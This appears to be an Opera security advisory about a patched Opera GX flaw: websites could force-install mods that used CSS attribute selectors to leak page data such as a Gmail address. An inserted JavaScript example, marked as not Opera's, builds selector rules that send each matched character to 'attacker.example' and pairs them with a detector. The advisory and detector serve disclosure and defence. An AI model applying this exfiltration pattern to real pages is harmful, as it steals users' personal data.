
Security fix: Addressing a GX mods vulnerability

Hi Opera users,

Recently, independent security researchers responsibly disclosed a vulnerability in Opera GX's mods functionality. After investigating the researchers' findings, we took immediate action, and the vulnerability has since been patched. If you are running Opera GX version 130.0.5847.89 or later, you have already received the fix.

Browser security is something we take very seriously at Opera. And part of being serious about security is being transparent. We have written before about how Opera works with independent security researchers who work hard to identify vulnerabilities in our products and alert us to them so we can fix them before they can be exploited by bad actors. 

After a fix has shipped, some researchers choose to publish the vulnerabilities they found and their methods, so that the broader security community can benefit from the shared knowledge. This practice of reporting privately, waiting for a patch, and only then publishing is called responsible (or coordinated) disclosure, and it is common practice across the software industry.

It’s also the reason why things like bug bounties exist – so that these researchers can be rewarded for their efforts in helping to keep the software we use every day safe and secure. Opera’s own bug bounty program can be found here.

Vulnerability analysis

Researchers zhero_ and inzo_ discovered that, under specific conditions, a third-party website could be set up to force the installation of a mod on Opera GX. As mods on GX, especially on the GX Store, can be applied without additional confirmation steps, the researchers found they could take advantage of this to force a malicious mod to be installed upon arrival to the malicious page.

Once installed, such a mod could use Cascading Style Sheets (CSS) rules, specifically attribute selectors that match on the value of an attribute, to read specific data attributes on pages you visit – such as a username or email address – and send that data back to an attacker's server by loading a unique, tracker-like URL for each selector that matched.

As a proof of concept, the researchers demonstrated how a malicious site could force-install a mod, automatically redirect a logged-in user to a Google account page, and use CSS selectors to exfiltrate the user’s Gmail address.
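To make the CSS technique above concrete, here is an added, self-contained simulation of attribute-selector exfiltration and of a check that flags such rules. This is not Opera's code and not the researchers' proof of concept; the attribute name `data-email`, the collector URL `https://attacker.example/c`, the alphabet, and the sample page object are constructed for illustration, and selector matching is simulated with a small function rather than a real DOM.

```javascript
// Added example (not Opera's or the researchers' code): how a CSS
// attribute-selector exfiltration rule set works, simulated offline, plus a
// heuristic check that flags such rules in a stylesheet. The attribute name,
// alphabet, sample element and collector URL are constructed for illustration.

const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789@.';

// One rule per candidate next character. A rule's selector only matches an
// element whose attribute starts with the prefix learned so far plus that
// character; its declaration loads a unique URL that tells the attacker which
// candidate matched.
function buildRules(attr, known, collectUrl) {
  return [...ALPHABET].map(c => {
    const url = `${collectUrl}?p=${encodeURIComponent(known + c)}`;
    return {
      selector: `[${attr}^="${known}${c}"]`,
      url,
      cssText: `[${attr}^="${known}${c}"] { background: url("${url}"); }`,
    };
  });
}

// Stand-in for the browser's selector matching, limited to the [attr^="prefix"]
// form this example uses. Elements are plain objects: { attributes: {name: value} }.
function matches(element, selector) {
  const m = /^\[([\w-]+)\^="([^"]*)"\]$/.exec(selector);
  if (!m) throw new Error('unsupported selector: ' + selector);
  const value = element.attributes[m[1]];
  return typeof value === 'string' && value.startsWith(m[2]);
}

// Which collector URLs would the browser request for this element and rule set?
// In a real page, a matching rule makes the browser fetch the background image.
function triggeredUrls(element, rules) {
  return rules.filter(r => matches(element, r.selector)).map(r => r.url);
}

// Attacker side: each request reveals one more character. Repeat with the longer
// prefix until no rule matches, i.e. the whole value has been recovered. A real
// attack serves a fresh stylesheet per round; here that is just a loop.
function exfiltrate(element, attr, collectUrl) {
  let known = '';
  for (;;) {
    const hits = triggeredUrls(element, buildRules(attr, known, collectUrl));
    if (hits.length === 0) return known;
    known = new URL(hits[0]).searchParams.get('p');
  }
}

// Defender side: a stylesheet rule that pairs an attribute-value selector with a
// remote url() is the signature of this pattern. Returns the offending selectors.
function findExfilRules(cssText) {
  const findings = [];
  const rule = /([^{}]*\[[^\]]*[\^$*]?=[^\]]*\])\s*\{([^}]*)\}/g;
  let m;
  while ((m = rule.exec(cssText)) !== null) {
    if (/url\(\s*["']?https?:\/\//i.test(m[2])) findings.push(m[1].trim());
  }
  return findings;
}

// Constructed sample: a logged-in page exposing the account email in an attribute.
const samplePage = { attributes: { 'data-email': 'alice@example.com' } };
const COLLECTOR = 'https://attacker.example/c';

// Walk through one full recovery and show the check catching the rule set.
const recovered = exfiltrate(samplePage, 'data-email', COLLECTOR);
const firstRound = buildRules('data-email', '', COLLECTOR).map(r => r.cssText).join('\n');
console.log('recovered value:', recovered);
console.log('flagged selectors in round-1 stylesheet:', findExfilRules(firstRound).length);
```

The check is deliberately coarse: a single attribute selector with a remote `url()` has benign uses, so in practice you would weight by the number of such rules and by whether the selectors target form fields or user-specific attributes.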

Triage and fix

The vulnerability was initially reported through our bug bounty program on Bugcrowd. Once our team had an opportunity to triage the bug submission, we moved to address the vulnerability. We updated our mod installation pipeline to ensure that no such mod can be downloaded and enabled without explicit user interaction and clear confirmation.

The issue was fixed as of Opera GX version 130.0.5847.89. If your Opera GX browser is up-to-date, you have already received the patched version.

After thoroughly investigating our systems and traffic, we are quite confident that the vulnerability was never exploited in the wild. The attack was not only complicated to set up, but for it to work, a very specific set of circumstances was required, which made it harder for a user to be affected.

Specifically, the user would have to be lured into visiting the malicious website set up for this purpose, end up with a freshly installed mod, and ignore the corresponding notification (which includes a button to remove the mod) long enough for the redirect to proceed.

What happens next

We want to extend our sincere thanks to the security researchers zhero_ and inzo_ who discovered and reported the issue to us. Their innovative thinking and collaborative approach show how important independent researchers are to the effort of keeping the web safe for users.

If you notice any vulnerabilities in Opera, please reach out to us – our bug bounty program is the most effective way to do that. You can also get in touch with our Security team directly. And of course, make sure to have the latest updates in your software installed; this is the best way to ensure you are protected!

As always, stay safe out there!
